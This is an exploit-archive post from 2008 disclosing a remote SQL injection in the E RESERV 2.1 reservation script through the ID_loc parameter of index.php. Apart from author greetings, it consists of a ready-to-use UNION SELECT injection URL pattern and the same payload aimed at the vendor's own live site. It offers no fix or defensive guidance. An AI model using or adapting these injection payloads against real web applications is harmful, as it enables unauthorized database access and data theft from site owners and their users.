E RESERV 2.1 (index.php ID_loc) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : E RESERV 2.1 (index.php ID_loc) SQL Injection Vulnerability
# Published : 2008-04-23
# Author : JiKo
# Previous Title : Joomla Component JPad 1.0 SQL Injection Vulnerability (postauth)
# Next Title : Joomla Component Filiale 1.0.4 (idFiliale) SQL Injection Vulnerability

=========================================================
=============== JIKI TEAM [ Maroc And YameN ]===============
=========================================================
# Author  : jiko
# email  : jalikom@hotmail.com
# Home   : www.no-back.org
# Script  : E RESERV VERSION 2.1
# Bug   : Remote SQL Injection Vulnerability
# Download  : http://cogites.com/e_reserv/index.php?num=21
=========================JIkI Team===================
# Exploit  :
 http://[Site]/[script]/index.php?ID_loc=[sql]
# Ex :
http://[Site]/[script]/index.php?ID_loc=-1 union select version()--
At Office Site
http://cogites.com/e_reserv/e_reserv/index.php?ID_loc=-1%20union%20select%20version()--
=========================================================
 greetz:
 all my friend and H-T Team and all No-back members and tryag.Com
 visit: www.no-back.org & www.tryag.com 
=========================================================

# www.Syue.com [2008-04-23]